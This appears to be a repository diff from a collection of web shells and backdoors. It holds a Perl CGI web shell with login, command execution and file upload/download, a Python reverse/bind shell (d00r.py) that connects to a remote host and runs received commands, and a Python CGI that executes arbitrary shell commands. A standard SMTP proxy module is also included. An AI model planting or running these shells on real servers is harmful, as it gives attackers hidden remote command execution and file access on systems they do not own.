| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 1.0
</font><font color="#FF0000"> ______ </font><font color="#AE8300"><3E> 2001, Rohitab Batra</font><font color="#FF0000">
.-&quot; &quot;-.
/ \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
)_/ \ /
(@ `--------`
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
$;
#'
print <<END;
<code>
Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "</font></body></html>";
}
#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}
#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "<code>Connection closed by foreign host.<br><br></code>";
}
#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <<END;
</xmp>
<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
<code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}
#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
{
# we change the directory internally. The output of the
# command is not displayed.
$OldDir = $CurrentDir;
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
print "<code>$Prompt $RunCommand</code>";
}
else # some other command, display the output
{
&PrintPageHeader("c");
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print "<code>$Prompt $RunCommand</code><xmp>";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput) # show output as it is generated
{
$|=1;
$Command .= " |";
open(CommandOutput, $Command);
while(<CommandOutput>)
{
$_ =~ s/(\n|\r\n)$//;
print "$_\n";
}
$|=0;
}
else # show output after command completes
{
print `$Command`;
}
if(!$WinNT)
{
alarm(0);
}
print "</xmp>";
}
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
local($FileUrl) = @_;
if(-e $FileUrl) # if the file exists
{
# encode the file link so we can send it to the browser
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
&PrintPageHeader("c");
print <<END;
<code>
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
</code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # file doesn't exist
{
&PrintPageHeader("f");
print "<code>Failed to download $FileUrl: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
local($SendFile) = @_;
if(open(SENDFILE, $SendFile)) # file opened for reading
{
if($WinNT)
{
binmode(SENDFILE);
binmode(STDOUT);
}
$FileSize = (stat($SendFile))[7];
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
print "Content-Type: application/x-unknown\n";
print "Content-Length: $FileSize\n";
print "Content-Disposition: attachment; filename=$1\n\n";
print while(<SENDFILE>);
close(SENDFILE);
}
else # failed to open file
{
&PrintPageHeader("f");
print "<code>Failed to download $SendFile: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
# if no file is specified, print the upload form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileUploadForm;
&PrintPageFooter;
return;
}
&PrintPageHeader("c");
# start the uploading process
print "<code>Uploading $TransferFile to $CurrentDir...<br>";
# get the fullly qualified pathname of the file to be created
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
$TransferFile =~ m!([^/^\\]*)$!;
$TargetName .= $PathSep.$1;
$TargetFileSize = length($in{'filedata'});
# if the file exists and we are not supposed to overwrite it
if(-e $TargetName && $Options ne "overwrite")
{
print "Failed: Destination file already exists.<br>";
}
else # file is not present
{
if(open(UPLOADFILE, ">$TargetName"))
{
binmode(UPLOADFILE) if $WinNT;
print UPLOADFILE $in{'filedata'};
close(UPLOADFILE);
print "Transfered $TargetFileSize Bytes.<br>";
print "File Path: $TargetName<br>";
}
else
{
print "Failed: $!<br>";
}
}
print "</code>";
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
# if no file is specified, print the download form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileDownloadForm;
&PrintPageFooter;
return;
}
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;
$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default
# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
&PerformLogin;
}
elsif($Action eq "command") # user wants to run a command
{
&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
&PerformLogout;
}

121
py/Phyton Shell.py Normal file
View File

@@ -0,0 +1,121 @@
#!/usr/bin/env python
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
# #
# alpha #
# #
# #
# usage: #
# % ./d00r -b password port #
# % ./d00r -r password port host #
# % nc host port #
# % nc -l -p port (please use netcat) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import os, sys, socket, time
# =================== var =======
MAX_LEN=1024
SHELL="/bin/zsh -c"
TIME_OUT=300 #s
PW=""
PORT=""
HOST=""
# =================== funct =====
# shell - exec command, return stdout, stderr; improvable
def shell(cmd):
sh_out=os.popen(SHELL+" "+cmd).readlines()
nsh_out=""
for i in range(len(sh_out)):
nsh_out+=sh_out[i]
return nsh_out
# action?
def action(conn):
conn.send("\nPass?\n")
try: pw_in=conn.recv(len(PW))
except: print "timeout"
else:
if pw_in == PW:
conn.send("j00 are on air!\n")
while True:
conn.send(">>> ")
try:
pcmd=conn.recv(MAX_LEN)
except:
print "timeout"
return True
else:
#print "pcmd:",pcmd
cmd=""#pcmd
for i in range(len(pcmd)-1):
cmd+=pcmd[i]
if cmd==":dc":
return True
elif cmd==":sd":
return False
else:
if len(cmd)>0:
out=shell(cmd)
conn.send(out)
# =================== main ======
argv=sys.argv
if len(argv)<4:
print "error; help: head -n 16 d00r.py"
sys.exit(1)
elif argv[1]=="-b":
PW=argv[2]
PORT=argv[3]
elif argv[1]=="-r" and len(argv)>4:
PW=argv[2]
PORT=argv[3]
HOST=argv[4]
else: exit(1)
PORT=int(PORT)
print "PW:",PW,"PORT:",PORT,"HOST:",HOST
#sys.argv[0]="d00r"
# exit father proc
if os.fork()!=0:
sys.exit(0)
# associate the socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
if argv[1]=="-b":
sock.bind(('localhost', PORT))
sock.listen(0)
run=True
while run:
if argv[1]=="-r":
try: sock.connect( (HOST, PORT) )
except:
print "host unreachable"
time.sleep(5)
else: run=action(sock)
else:
try: (conn,addr)=sock.accept()
except:
print "timeout"
time.sleep(1)
else: run=action(conn)
# shutdown the sokcet
if argv[1]=="-b": conn.shutdown(2)
else:
try: sock.send("")
except: time.sleep(1)
else: sock.shutdown(2)

124
py/cgi-python.py Normal file
View File

@@ -0,0 +1,124 @@
#!/usr/bin/python
# 07-07-04
# v1.0.0
# cgi-shell.py
# A simple CGI that executes arbitrary shell commands.
# Copyright Michael Foord
# You are free to modify, use and relicense this code.
# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
# Use at your own risk !!!
# E-mail michael AT foord DOT me DOT uk
# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
"""
A simple CGI script to execute shell commands via CGI.
"""
################################################################
# Imports
try:
import cgitb; cgitb.enable()
except:
pass
import sys, cgi, os
sys.stderr = sys.stdout
from time import strftime
import traceback
from StringIO import StringIO
from traceback import print_exc
################################################################
# constants
fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
versionstring = 'Version 1.0.0 7th July 2004'
if os.environ.has_key("SCRIPT_NAME"):
scriptname = os.environ["SCRIPT_NAME"]
else:
scriptname = ""
METHOD = '"POST"'
################################################################
# Private functions and variables
def getform(valuelist, theform, notpresent=''):
"""This function, given a CGI form, extracts the data from it, based on
valuelist passed in. Any non-present values are set to '' - although this can be changed.
(e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
data = {}
for field in valuelist:
if not theform.has_key(field):
data[field] = notpresent
else:
if type(theform[field]) != type([]):
data[field] = theform[field].value
else:
values = map(lambda x: x.value, theform[field]) # allows for list type values
data[field] = values
return data
theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
<BODY><CENTER>
<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
<B><I>By Fuzzyman</B></I><BR>
"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
theform = """<H2>Enter Command</H2>
<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
<input name=cmd type=text><BR>
<input type=submit value="Submit"><BR>
</FORM><BR><BR>"""
bodyend = '</BODY></HTML>'
errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
################################################################
# main body of the script
if __name__ == '__main__':
print "Content-type: text/html" # this is the header to the server
print # so is this blank line
form = cgi.FieldStorage()
data = getform(['cmd'],form)
thecmd = data['cmd']
print theformhead
print theform
if thecmd:
print '<HR><BR><BR>'
print '<B>Command : ', thecmd, '<BR><BR>'
print 'Result : <BR><BR>'
try:
child_stdin, child_stdout = os.popen2(thecmd)
child_stdin.close()
result = child_stdout.read()
child_stdout.close()
print result.replace('\n', '<BR>')
except Exception, e: # an error in executing the command
print errormess
f = StringIO()
print_exc(file=f)
a = f.getvalue().splitlines()
for line in a:
print line
print bodyend
"""
TODO/ISSUES
CHANGELOG
07-07-04 Version 1.0.0
A very basic system for executing shell commands.
I may expand it into a proper 'environment' with session persistence...
"""

549
py/smtpd.py Normal file
View File

@@ -0,0 +1,549 @@
#!/usr/local/bin/python
"""An RFC 2821 smtp proxy.
Usage: %(program)s [options] [localhost:localport [remotehost:remoteport]]
Options:
--nosetuid
-n
This program generally tries to setuid `nobody', unless this flag is
set. The setuid call will fail if this program is not run as root (in
which case, use this flag).
--version
-V
Print the version number and exit.
--class classname
-c classname
Use `classname' as the concrete SMTP proxy class. Uses `PureProxy' by
default.
--debug
-d
Turn on debugging prints.
--help
-h
Print this message and exit.
Version: %(__version__)s
If localhost is not given then `localhost' is used, and if localport is not
given then 8025 is used. If remotehost is not given then `localhost' is used,
and if remoteport is not given, then 25 is used.
"""
# Overview:
#
# This file implements the minimal SMTP protocol as defined in RFC 821. It
# has a hierarchy of classes which implement the backend functionality for the
# smtpd. A number of classes are provided:
#
# SMTPServer - the base class for the backend. Raises NotImplementedError
# if you try to use it.
#
# DebuggingServer - simply prints each message it receives on stdout.
#
# PureProxy - Proxies all messages to a real smtpd which does final
# delivery. One known problem with this class is that it doesn't handle
# SMTP errors from the backend server at all. This should be fixed
# (contributions are welcome!).
#
# MailmanProxy - An experimental hack to work with GNU Mailman
# <www.list.org>. Using this server as your real incoming smtpd, your
# mailhost will automatically recognize and accept mail destined to Mailman
# lists when those lists are created. Every message not destined for a list
# gets forwarded to a real backend smtpd, as with PureProxy. Again, errors
# are not handled correctly yet.
#
# Please note that this script requires Python 2.0
#
# Author: Barry Warsaw <barry@python.org>
#
# TODO:
#
# - support mailbox delivery
# - alias files
# - ESMTP
# - handle error codes from the backend smtpd
import sys
import os
import errno
import getopt
import time
import socket
import asyncore
import asynchat
__all__ = ["SMTPServer","DebuggingServer","PureProxy","MailmanProxy"]
program = sys.argv[0]
__version__ = 'Python SMTP proxy version 0.2'
class Devnull:
def write(self, msg): pass
def flush(self): pass
DEBUGSTREAM = Devnull()
NEWLINE = '\n'
EMPTYSTRING = ''
COMMASPACE = ', '
def usage(code, msg=''):
print >> sys.stderr, __doc__ % globals()
if msg:
print >> sys.stderr, msg
sys.exit(code)
class SMTPChannel(asynchat.async_chat):
COMMAND = 0
DATA = 1
def __init__(self, server, conn, addr):
asynchat.async_chat.__init__(self, conn)
self.__server = server
self.__conn = conn
self.__addr = addr
self.__line = []
self.__state = self.COMMAND
self.__greeting = 0
self.__mailfrom = None
self.__rcpttos = []
self.__data = ''
self.__fqdn = socket.getfqdn()
self.__peer = conn.getpeername()
print >> DEBUGSTREAM, 'Peer:', repr(self.__peer)
self.push('220 %s %s' % (self.__fqdn, __version__))
self.set_terminator('\r\n')
# Overrides base class for convenience
def push(self, msg):
asynchat.async_chat.push(self, msg + '\r\n')
# Implementation of base class abstract method
def collect_incoming_data(self, data):
self.__line.append(data)
# Implementation of base class abstract method
def found_terminator(self):
line = EMPTYSTRING.join(self.__line)
print >> DEBUGSTREAM, 'Data:', repr(line)
self.__line = []
if self.__state == self.COMMAND:
if not line:
self.push('500 Error: bad syntax')
return
method = None
i = line.find(' ')
if i < 0:
command = line.upper()
arg = None
else:
command = line[:i].upper()
arg = line[i+1:].strip()
method = getattr(self, 'smtp_' + command, None)
if not method:
self.push('502 Error: command "%s" not implemented' % command)
return
method(arg)
return
else:
if self.__state != self.DATA:
self.push('451 Internal confusion')
return
# Remove extraneous carriage returns and de-transparency according
# to RFC 821, Section 4.5.2.
data = []
for text in line.split('\r\n'):
if text and text[0] == '.':
data.append(text[1:])
else:
data.append(text)
self.__data = NEWLINE.join(data)
status = self.__server.process_message(self.__peer,
self.__mailfrom,
self.__rcpttos,
self.__data)
self.__rcpttos = []
self.__mailfrom = None
self.__state = self.COMMAND
self.set_terminator('\r\n')
if not status:
self.push('250 Ok')
else:
self.push(status)
# SMTP and ESMTP commands
def smtp_HELO(self, arg):
if not arg:
self.push('501 Syntax: HELO hostname')
return
if self.__greeting:
self.push('503 Duplicate HELO/EHLO')
else:
self.__greeting = arg
self.push('250 %s' % self.__fqdn)
def smtp_NOOP(self, arg):
if arg:
self.push('501 Syntax: NOOP')
else:
self.push('250 Ok')
def smtp_QUIT(self, arg):
# args is ignored
self.push('221 Bye')
self.close_when_done()
# factored
def __getaddr(self, keyword, arg):
address = None
keylen = len(keyword)
if arg[:keylen].upper() == keyword:
address = arg[keylen:].strip()
if not address:
pass
elif address[0] == '<' and address[-1] == '>' and address != '<>':
# Addresses can be in the form <person@dom.com> but watch out
# for null address, e.g. <>
address = address[1:-1]
return address
def smtp_MAIL(self, arg):
print >> DEBUGSTREAM, '===> MAIL', arg
address = self.__getaddr('FROM:', arg)
if not address:
self.push('501 Syntax: MAIL FROM:<address>')
return
if self.__mailfrom:
self.push('503 Error: nested MAIL command')
return
self.__mailfrom = address
print >> DEBUGSTREAM, 'sender:', self.__mailfrom
self.push('250 Ok')
def smtp_RCPT(self, arg):
print >> DEBUGSTREAM, '===> RCPT', arg
if not self.__mailfrom:
self.push('503 Error: need MAIL command')
return
address = self.__getaddr('TO:', arg)
if not address:
self.push('501 Syntax: RCPT TO: <address>')
return
self.__rcpttos.append(address)
print >> DEBUGSTREAM, 'recips:', self.__rcpttos
self.push('250 Ok')
def smtp_RSET(self, arg):
if arg:
self.push('501 Syntax: RSET')
return
# Resets the sender, recipients, and data, but not the greeting
self.__mailfrom = None
self.__rcpttos = []
self.__data = ''
self.__state = self.COMMAND
self.push('250 Ok')
def smtp_DATA(self, arg):
if not self.__rcpttos:
self.push('503 Error: need RCPT command')
return
if arg:
self.push('501 Syntax: DATA')
return
self.__state = self.DATA
self.set_terminator('\r\n.\r\n')
self.push('354 End data with <CR><LF>.<CR><LF>')
class SMTPServer(asyncore.dispatcher):
def __init__(self, localaddr, remoteaddr):
self._localaddr = localaddr
self._remoteaddr = remoteaddr
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(localaddr)
self.listen(5)
print >> DEBUGSTREAM, \
'%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
self.__class__.__name__, time.ctime(time.time()),
localaddr, remoteaddr)
def handle_accept(self):
conn, addr = self.accept()
print >> DEBUGSTREAM, 'Incoming connection from %s' % repr(addr)
channel = SMTPChannel(self, conn, addr)
# API for "doing something useful with the message"
def process_message(self, peer, mailfrom, rcpttos, data):
"""Override this abstract method to handle messages from the client.
peer is a tuple containing (ipaddr, port) of the client that made the
socket connection to our smtp port.
mailfrom is the raw address the client claims the message is coming
from.
rcpttos is a list of raw addresses the client wishes to deliver the
message to.
data is a string containing the entire full text of the message,
headers (if supplied) and all. It has been `de-transparencied'
according to RFC 821, Section 4.5.2. In other words, a line
containing a `.' followed by other text has had the leading dot
removed.
This function should return None, for a normal `250 Ok' response;
otherwise it returns the desired response string in RFC 821 format.
"""
raise NotImplementedError
class DebuggingServer(SMTPServer):
# Do something with the gathered message
def process_message(self, peer, mailfrom, rcpttos, data):
inheaders = 1
lines = data.split('\n')
print '---------- MESSAGE FOLLOWS ----------'
for line in lines:
# headers first
if inheaders and not line:
print 'X-Peer:', peer[0]
inheaders = 0
print line
print '------------ END MESSAGE ------------'
class PureProxy(SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
lines = data.split('\n')
# Look for the last header
i = 0
for line in lines:
if not line:
break
i += 1
lines.insert(i, 'X-Peer: %s' % peer[0])
data = NEWLINE.join(lines)
refused = self._deliver(mailfrom, rcpttos, data)
# TBD: what to do with refused addresses?
print >> DEBUGSTREAM, 'we got some refusals:', refused
def _deliver(self, mailfrom, rcpttos, data):
import smtplib
refused = {}
try:
s = smtplib.SMTP()
s.connect(self._remoteaddr[0], self._remoteaddr[1])
try:
refused = s.sendmail(mailfrom, rcpttos, data)
finally:
s.quit()
except smtplib.SMTPRecipientsRefused, e:
print >> DEBUGSTREAM, 'got SMTPRecipientsRefused'
refused = e.recipients
except (socket.error, smtplib.SMTPException), e:
print >> DEBUGSTREAM, 'got', e.__class__
# All recipients were refused. If the exception had an associated
# error code, use it. Otherwise,fake it with a non-triggering
# exception code.
errcode = getattr(e, 'smtp_code', -1)
errmsg = getattr(e, 'smtp_error', 'ignore')
for r in rcpttos:
refused[r] = (errcode, errmsg)
return refused
class MailmanProxy(PureProxy):
def process_message(self, peer, mailfrom, rcpttos, data):
from cStringIO import StringIO
from Mailman import Utils
from Mailman import Message
from Mailman import MailList
# If the message is to a Mailman mailing list, then we'll invoke the
# Mailman script directly, without going through the real smtpd.
# Otherwise we'll forward it to the local proxy for disposition.
listnames = []
for rcpt in rcpttos:
local = rcpt.lower().split('@')[0]
# We allow the following variations on the theme
# listname
# listname-admin
# listname-owner
# listname-request
# listname-join
# listname-leave
parts = local.split('-')
if len(parts) > 2:
continue
listname = parts[0]
if len(parts) == 2:
command = parts[1]
else:
command = ''
if not Utils.list_exists(listname) or command not in (
'', 'admin', 'owner', 'request', 'join', 'leave'):
continue
listnames.append((rcpt, listname, command))
# Remove all list recipients from rcpttos and forward what we're not
# going to take care of ourselves. Linear removal should be fine
# since we don't expect a large number of recipients.
for rcpt, listname, command in listnames:
rcpttos.remove(rcpt)
# If there's any non-list destined recipients left,
print >> DEBUGSTREAM, 'forwarding recips:', ' '.join(rcpttos)
if rcpttos:
refused = self._deliver(mailfrom, rcpttos, data)
# TBD: what to do with refused addresses?
print >> DEBUGSTREAM, 'we got refusals:', refused
# Now deliver directly to the list commands
mlists = {}
s = StringIO(data)
msg = Message.Message(s)
# These headers are required for the proper execution of Mailman. All
# MTAs in existance seem to add these if the original message doesn't
# have them.
if not msg.getheader('from'):
msg['From'] = mailfrom
if not msg.getheader('date'):
msg['Date'] = time.ctime(time.time())
for rcpt, listname, command in listnames:
print >> DEBUGSTREAM, 'sending message to', rcpt
mlist = mlists.get(listname)
if not mlist:
mlist = MailList.MailList(listname, lock=0)
mlists[listname] = mlist
# dispatch on the type of command
if command == '':
# post
msg.Enqueue(mlist, tolist=1)
elif command == 'admin':
msg.Enqueue(mlist, toadmin=1)
elif command == 'owner':
msg.Enqueue(mlist, toowner=1)
elif command == 'request':
msg.Enqueue(mlist, torequest=1)
elif command in ('join', 'leave'):
# TBD: this is a hack!
if command == 'join':
msg['Subject'] = 'subscribe'
else:
msg['Subject'] = 'unsubscribe'
msg.Enqueue(mlist, torequest=1)
class Options:
setuid = 1
classname = 'PureProxy'
def parseargs():
global DEBUGSTREAM
try:
opts, args = getopt.getopt(
sys.argv[1:], 'nVhc:d',
['class=', 'nosetuid', 'version', 'help', 'debug'])
except getopt.error, e:
usage(1, e)
options = Options()
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-V', '--version'):
print >> sys.stderr, __version__
sys.exit(0)
elif opt in ('-n', '--nosetuid'):
options.setuid = 0
elif opt in ('-c', '--class'):
options.classname = arg
elif opt in ('-d', '--debug'):
DEBUGSTREAM = sys.stderr
# parse the rest of the arguments
if len(args) < 1:
localspec = 'localhost:8025'
remotespec = 'localhost:25'
elif len(args) < 2:
localspec = args[0]
remotespec = 'localhost:25'
elif len(args) < 3:
localspec = args[0]
remotespec = args[1]
else:
usage(1, 'Invalid arguments: %s' % COMMASPACE.join(args))
# split into host/port pairs
i = localspec.find(':')
if i < 0:
usage(1, 'Bad local spec: %s' % localspec)
options.localhost = localspec[:i]
try:
options.localport = int(localspec[i+1:])
except ValueError:
usage(1, 'Bad local port: %s' % localspec)
i = remotespec.find(':')
if i < 0:
usage(1, 'Bad remote spec: %s' % remotespec)
options.remotehost = remotespec[:i]
try:
options.remoteport = int(remotespec[i+1:])
except ValueError:
usage(1, 'Bad remote port: %s' % remotespec)
return options
if __name__ == '__main__':
options = parseargs()
# Become nobody
if options.setuid:
try:
import pwd
except ImportError:
print >> sys.stderr, \
'Cannot import module "pwd"; try running with -n option.'
sys.exit(1)
nobody = pwd.getpwnam('nobody')[2]
try:
os.setuid(nobody)
except OSError, e:
if e.errno != errno.EPERM: raise
print >> sys.stderr, \
'Cannot setuid "nobody"; try running with -n option.'
sys.exit(1)
classname = options.classname
if "." in classname:
lastdot = classname.rfind(".")
mod = __import__(classname[:lastdot], globals(), locals(), [""])
classname = classname[lastdot+1:]
else:
import __main__ as mod
class_ = getattr(mod, classname)
proxy = class_((options.localhost, options.localport),
(options.remotehost, options.remoteport))
try:
asyncore.loop()
except KeyboardInterrupt:
pass